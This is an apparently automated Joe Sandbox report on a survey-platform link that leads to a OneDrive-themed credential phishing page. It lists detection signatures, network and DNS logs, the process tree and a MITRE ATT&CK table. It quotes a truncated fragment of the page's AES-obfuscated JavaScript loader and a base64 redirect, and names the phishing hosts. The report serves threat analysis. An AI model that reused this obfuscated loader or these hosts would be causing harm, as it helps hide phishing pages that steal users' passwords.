Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://cx.surveysensum.com/fd3Butxp

Overview

General Information

Sample URL:	https://cx.surveysensum.com/fd3Butxp
Analysis ID:	1501361

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

AI detected landing page (webpage, office document or email)

HTML page contains hidden URLs

HTML page contains suspicious javascript code

Phishing site detected (based on shot match)

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTML title does not match URL

Stores files to the Windows start menu directory

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 3428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cx.surveysensum.com/fd3Butxp MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1840,i,6590694890514502763,6039084468699758381,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://cx.surveysensum.com/fd3Butxp	LLM: Score: 10 Reasons: The domain 'cx.surveysensum.com' does not match the legitimate domain associated with OneDrive, and the presence of a button labeled 'VIEW DOCUMENT' and a disclaimer about sensitive information suggests that the site is designed to trick users into providing their credentials for malicious purposes. DOM: 4.1.pages.csv
Source: https://infinitispark.msk.ru/DiuXc/	LLM: Score: 8 Reasons: The domain 'infinitispark.msk.ru' seems to be a legitimate domain for the brand 'Infiniti Spark', but the use of a subdomain '.msk.ru' is unusual. Typically, the top-level domain '.ru' is used for Russian websites, but the subdomain '.msk.ru' is not a common or well-known domain. Additionally, the URL does not have any obvious phishing indicators, but the lack of a secure protocol (HTTPS) and the use of a subdomain raise some suspicions. DOM: 6.5.pages.csv

HTML page contains hidden URLs

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: https://quantumradius.msk.ru///925.php

HTML page contains suspicious javascript code

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: window.location.href = atob(

Phishing site detected (based on shot match)

Source: https://infinitispark.msk.ru/DiuXc/	Matcher: Template: captcha matched
Source: https://infinitispark.msk.ru/DiuXc/	Matcher: Template: captcha matched

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: async function waders(macron) {  var {a,b,c,d} = json.parse(macron); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8);  } (async () => { document.write(await waders(await (await fetch(await waders(atob(`eyjhijoickzhntdwthveundiecsxzjq1bvi3dg1cnmsyz2v4d1wvk2tszhfkunirnmm9iiwiyyi6ijg4yzgzzdbkzte3zjjizwe2nmm2mgfhowm4njnkzja0iiwiyii6ijflnjkxowjmntg4ntzlzwyzmgyzndrizdy1mduwytq3mtfizwiymty0owfin2njzmy2ngvizgu5owq0nti5zjcyodnlmmm4ymm3yjq3ndq2zmvhm2y0ogzkmgvlzjzmmjlmyzvmzwq0ytyzyjg2nmziywjlzdrknweyn2iwndazyzeyodawythkmthkodjjmgizyjbjy2qymjq0nmnimjvjnwjjnwviodm5nwewndjkmddlnmu1zwu4owy3nzq1m2i2otjmzjm2ytqynwvhntkwmdziotjkmzrhndu2owi1njdjn2nmowfjnwzkngjlyjvjotg4nje2mjdloda4ndf...

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: Number of links: 0

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: Total embedded image size: 45708

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: Base64 decoded: {"version":3,"sourceRoot":"/cfsetup_build/src/orchestrator/turnstile/templates","sources":["turnstile.scss"],"names":[],"mappings":"AAmCA;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IAEI;;EAGJ;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI...

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: Title: Log in to continue does not match URL

Source: https://infinitispark.msk.ru/DiuXc/

HTTP Parser: <input type="password" .../> found

Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No favicon
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No favicon
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No favicon
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No favicon
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No favicon
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No favicon

Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No <meta name="author".. found
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No <meta name="author".. found
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No <meta name="author".. found
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No <meta name="author".. found

Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No <meta name="copyright".. found
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No <meta name="copyright".. found
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No <meta name="copyright".. found
Source: https://infinitispark.msk.ru/DiuXc/	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.44.239.154:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.183.220.149:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.183.220.149:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.183.220.149:443 -> 192.168.2.16:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49784 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.16:49787 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49787 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49787 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49787 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49787 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49787 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49787 -> 1.1.1.1:53

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27

Source: global traffic	DNS traffic detected: DNS query: cx.surveysensum.com
Source: global traffic	DNS traffic detected: DNS query: s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: prod-micro.surveysensum.com
Source: global traffic	DNS traffic detected: DNS query: neurosensum-production-storage.s3.ap-southeast-1.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: muj5y37wadgmdjwugqfepukxo40dfqeb.lambda-url.ap-southeast-1.on.aws
Source: global traffic	DNS traffic detected: DNS query: public-neurosensum-production-storage.s3.ap-southeast-1.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: infinitispark.msk.ru
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: quantumradius.msk.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.44.239.154:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.183.220.149:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.183.220.149:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.183.220.149:443 -> 192.168.2.16:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49784 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.win@17/21@50/242

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cx.surveysensum.com/fd3Butxp
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1840,i,6590694890514502763,6039084468699758381,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1840,i,6590694890514502763,6039084468699758381,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

AI detected landing page (webpage, office document or email)

Source: https://cx.surveysensum.com/fd3Butxp

LLM: Page with brand: 'OneDrive' contains button: 'VIEW DOCUMENT' Source: '4.1.pages.csv'

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://cx.surveysensum.com/fd3Butxp	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
infinitispark.msk.ru	104.21.42.218	true	true		unknown
